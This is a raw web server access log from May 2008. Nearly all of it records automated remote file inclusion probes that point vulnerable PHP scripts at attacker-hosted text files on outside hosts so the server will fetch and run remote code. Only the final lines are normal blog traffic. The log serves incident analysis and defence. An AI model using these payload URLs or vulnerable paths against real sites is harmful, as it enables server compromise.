212.162.13.240 - - [19/May/2008:09:43:56 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:43:56 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:44:19 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:09:44:19 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:44:21 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:44:21 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:44:22 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:44:24 -0700] "GET /logs/access_080308.log//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:44:24 -0700] "GET //mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:44:24 -0700] "GET /logs//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:44:37 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:44:37 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:44:39 -0700] "GET //mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:44:40 -0700] "GET /logs/access_080201.log//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:44:40 -0700] "GET /logs//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:09:44:41 -0700] "GET /logs/access_080308.log//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:09:45:18 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:09:45:18 -0700] "GET //include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:09:45:18 -0700] "GET /logs//include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:45:28 -0700] "GET /logs//appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:45:28 -0700] "GET //appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:45:40 -0700] "GET /logs/access_080219.log//mcf.php?content=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:45:43 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:45:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:45:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:45:54 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:45:57 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:09:45:58 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:46:14 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:46:15 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:34 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:46:37 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:09:46:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:09:46:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [19/May/2008:09:47:00 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.230.148.86 - - [19/May/2008:09:47:00 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:47:12 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:47:12 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:47:18 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:47:18 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:09:47:31 -0700] "GET //include/lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:09:47:40 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.62.35.164 - - [19/May/2008:09:47:40 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:47:40 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:47:46 -0700] "GET /logs/access_071227.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:47:47 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:47:47 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:47:50 -0700] "GET /logs/access_080120.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:48:04 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.252.7 - - [19/May/2008:09:48:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:48:27 -0700] "GET //appserv/main.php?appserv_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:48:33 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:48:34 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:48:36 -0700] "GET /logs/index.php?configFile=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:48:44 -0700] "GET /index.php?configFile=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:09:48:45 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:09:48:45 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:49:08 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:49:10 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.56.138 - - [19/May/2008:09:49:10 -0700] "GET /index.php?configFile=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:09:49:10 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:09:49:10 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:09:49:13 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.115.202 - - [19/May/2008:09:49:13 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:49:14 -0700] "GET /logs/access_071219.log//errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:49:14 -0700] "GET //errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:49:15 -0700] "GET /logs//errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:49:47 -0700] "GET /logs/access_071220.log//errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:49:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:09:49:48 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:50:02 -0700] "GET /logs/access_080119.log//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:50:03 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:50:03 -0700] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:50:33 -0700] "GET //errors.php?error=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:50:47 -0700] "GET //phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:50:49 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:09:50:56 -0700] "GET /logs/access_080123.log//phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:50:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/May/2008:09:51:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:51:26 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:51:30 -0700] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:51:31 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:51:31 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [19/May/2008:09:51:32 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:51:39 -0700] "GET /logs/access_080215.log//content.php?inc=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:51:41 -0700] "GET //content.php?inc=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:09:51:41 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:09:51:41 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:51:43 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:51:43 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:51:43 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:51:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:51:44 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:51:47 -0700] "GET /logs///plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.145 - - [19/May/2008:09:51:47 -0700] "GET ///plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://findarticlesabout.com/backup/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:51:48 -0700] "GET /logs//content.php?inc=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:51:52 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:54 -0700] "GET / HTTP/1.1" 200 11606 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:54 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
66.82.9.83 - - [19/May/2008:09:51:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
